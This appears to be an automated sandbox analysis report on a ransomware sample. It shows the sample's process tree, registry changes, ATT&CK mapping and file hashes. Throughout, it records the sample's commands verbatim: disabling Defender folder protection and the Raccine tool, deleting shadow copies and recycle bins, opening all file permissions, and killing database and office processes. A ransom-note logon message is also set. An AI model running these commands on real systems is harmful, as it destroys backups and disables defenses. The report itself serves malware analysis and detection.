PID 1084 wrote to memory of 328	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	arp.exe
PID 1084 wrote to memory of 328	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	arp.exe
PID 1084 wrote to memory of 328	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	arp.exe
PID 1084 wrote to memory of 652	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 652	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 652	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe
PID 1084 wrote to memory of 1212	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	mountvol.exe
PID 1084 wrote to memory of 1212	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	mountvol.exe
PID 1084 wrote to memory of 1212	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	mountvol.exe
PID 1084 wrote to memory of 932	1084	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Attention Attention Attention!"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Good afternoon. Do you have any difficulties at work?\r\nDo not worry, our IT specialists will help you.\r\nTo do this, please email us.\r\n\r\nOur email - filesrestore000@msgsafe.io"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe

C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
1⤵
- Drops startup file
- Windows security modification
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
2⤵
PID:1480

C:\Windows\system32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
PID:644

C:\Windows\system32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:1704

C:\Windows\system32\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:1308

C:\Windows\system32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:1176

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:860

C:\Windows\system32\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:1248

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:672

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:544

C:\Windows\system32\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:1204

C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:788

C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:1540

C:\Windows\system32\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:968

C:\Windows\system32\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:1348

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:1996

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
PID:1208

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
PID:328

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
PID:956

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:652

C:\Windows\system32\arp.exe
"arp" -a
2⤵
PID:1212

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
PID:932

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
PID:1012

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
PID:776

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:788

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
PID:668

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
PID:1704

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
PID:2024

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
PID:1348

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
PID:1944

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
PID:1472

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
PID:1276

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:756

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
PID:1012

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
PID:1596

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1300

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
PID:1932

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
PID:1348

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
PID:1176

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
PID:1704

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
PID:1208

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
PID:1368

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1348

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
PID:1248

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
PID:1616

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
PID:532

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1308

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
PID:1944

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
PID:1144

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
PID:1160

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:932

C:\Windows\system32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
PID:1932

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
PID:1704

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sql.exe /f
2⤵
- Kills process with taskkill
PID:1652

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqld.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysql.exe /f
2⤵
- Kills process with taskkill
PID:1596

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /f
2⤵
- Kills process with taskkill
PID:2024

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1424

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM vmwp.exe /f
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
2⤵
PID:1752

C:\Windows\system32\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\system32\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\system32\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\system32\cmd.exe
"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA0F1.bat
2⤵
PID:340

C:\Windows\system32\find.exe
find "}\"
3⤵
PID:1700

C:\Windows\system32\mountvol.exe
mountvol
3⤵
PID:1212

C:\Windows\system32\mountvol.exe
mountvol !freedrive!: \\?\Volume{efb60be3-9a04-11eb-be03-806e6f6e6963}\
3⤵
PID:1732

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\system32\mountvol.exe
mountvol !freedrive!: \\?\Volume{efb60be4-9a04-11eb-be03-806e6f6e6963}\
3⤵
PID:1160

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
- Suspicious use of AdjustPrivilegeToken
PID:644

C:\Windows\system32\mountvol.exe
mountvol !freedrive!: \\?\Volume{efb60be7-9a04-11eb-be03-806e6f6e6963}\
3⤵
PID:1592

C:\Windows\system32\PING.EXE
ping -n 2 127.0.0.1
3⤵
- Runs ping.exe
PID:328

C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\system32\cmd.exe
"cmd.exe" /c rd /s /q D:\\$Recycle.bin
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:1708

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
2⤵
PID:544

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:824

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\system32\arp.exe
"arp" -a
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:328

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b3b6fff8-e141-43af-bd2a-269db93b7a80 /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1648

C:\Windows\system32\icacls.exe
"icacls.exe" C:\$RmMetadata\$TxfLog\$TxfLogContainer00000000000000000001 /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1052

C:\Windows\system32\icacls.exe
"icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1596

C:\Windows\system32\icacls.exe
"icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:968

C:\Windows\system32\icacls.exe
"icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:644

C:\Windows\system32\icacls.exe
"icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1012

C:\Windows\system32\icacls.exe
"icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1068

C:\Windows\system32\icacls.exe
"icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:340

C:\Windows\system32\icacls.exe
"icacls.exe" C:\vcredist2019_x64_001_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1960

C:\Windows\system32\icacls.exe
"icacls.exe" C:\vcredist2019_x64_002_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1856

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Videos\Sample Videos\Wildlife.wmv /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1568

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:840

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1248

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Desert.jpg /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:652

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1648

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:560

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Koala.jpg /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1760

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1756

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1776

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:892

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Music\Sample Music\Kalimba.mp3 /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:668

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:776

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Music\Sample Music\Sleep Away.mp3 /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:756

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\Public\Libraries\RecordedTV.library-ms /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:800

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\All Users\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1764

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\All Users\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:860

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:644

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:824

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1160

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:760

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1100

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:340

C:\Windows\system32\icacls.exe
"icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q
2⤵
- Modifies file permissions
PID:1912

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-13761155721986794809-1493866173-1910893253211593407953165207-1125627503-1647108966"
1⤵
PID:1204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1191651113-13346433231658390782342539021692812168-1087973126-892946284929361287"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "19774514992063745945-974347785-103951018511422303969548461401528793181945740238"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:776

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "196700962-18330053071801255127-1198616170-1817106901865575577-17346466661115065155"
1⤵
PID:1996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-599463735-672272269-9201149432029812788-14765934551760979939656644865-868764459"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1368

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-465192196-9571944451256254972-1038971029-1606775532577937482-896512665-1711281103"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:668

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-11518335781266852885-18066310891898066341-2080508518-5348167821080953589-1451577864"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "176871740716305045631123664020-1818959395313571608-122557174-1491186507595437401"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-133086344410419303511261091253-1098395045-206191471-71141930-775230793715951388"
1⤵
PID:672

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2146428921-1612020045731318091152551151019433559611567519470454040442-432499136"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1752

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "3242720156096035739844578815625526231880393434873460144885636091278395197"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:532

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "18093276711860534578435971933-21290817906073727491299306536-18664242922062384493"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1aea85c8-3478-42da-ad27-6ec27ea96fc1
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a8d070b-1b17-48b0-a281-62da21c440a7
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_629d29d5-a38a-4942-8c41-156a488ac9f0
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c63dcd11-9510-4f12-a467-7ede9f71a88f
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8969ebf-5ca0-46b8-9657-96e2215b9d1c
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d10fa182-df6c-460c-81bb-76fb52046b4b
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ebca97c2-16bb-4771-8b4b-be5c4c6267ca
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
fd241d0ae8c5e66051e547f011c6db58

SHA1
07491d9e0287f3c7e020b7be3944f55b6f8ccbf6

SHA256
460e26e8fe3ce2a0f5a82e59896594779c080d9e056c208dd6ba28ff89ce5c9b

SHA512
